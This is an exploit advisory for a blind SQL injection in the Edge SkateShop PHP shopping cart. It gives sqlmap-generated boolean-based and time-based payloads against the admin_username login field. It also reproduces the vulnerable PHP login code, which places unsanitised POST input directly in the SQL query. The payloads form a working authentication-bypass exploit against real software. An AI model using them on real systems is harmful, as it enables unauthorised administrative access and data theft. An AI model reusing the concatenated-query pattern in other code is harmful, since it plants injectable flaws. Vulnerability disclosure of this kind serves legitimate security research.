# Exploit Title: Edge SkateShop Blind Sql Injection
# Date: 12/12/2016
# Exploit Author: Andrea Bocchetti
# Vendor HomePage: http://www.sourcecodester.com/php/10964/basic-shopping-cartphpmysql.html
# Software Link: http://www.sourcecodester.com/sites/default/files/download/gebbz/edgesketch.zip
# Version : n/a
# Tested on: kali linux
# Proof of Concept (Using SQLMap) :
Parameter: admin_username (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: admin_username=-8520' OR 6015=6015-- PORX&admin_password=&admin_login=Scmp
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 OR time-based blind
Payload: admin_username=yzsT' OR SLEEP(5)-- Qgnn&admin_password=&admin_login=Scmp
Issue :
if(isset($_POST['admin_login']))
{
$admin_username=$_POST['admin_username'];
$admin_password=$_POST['admin_password'];
$check_admin="select * from admin WHERE admin_username='$admin_username' AND admin_password='$admin_password'";
$run=mysqli_query($dbcon,$check_admin);
if(mysqli_num_rows($run))
{
echo "<script>alert('You're successfully login!')</script>";
echo "<script>window.open('Admin/index.php','_self')</script>";
$_SESSION['admin_username']=$admin_username;
}
else
{
echo "<script>alert('Username or password is incorrect!')</script>";
echo "<script>window.open('index.php','_self')</script>";
exit();
}
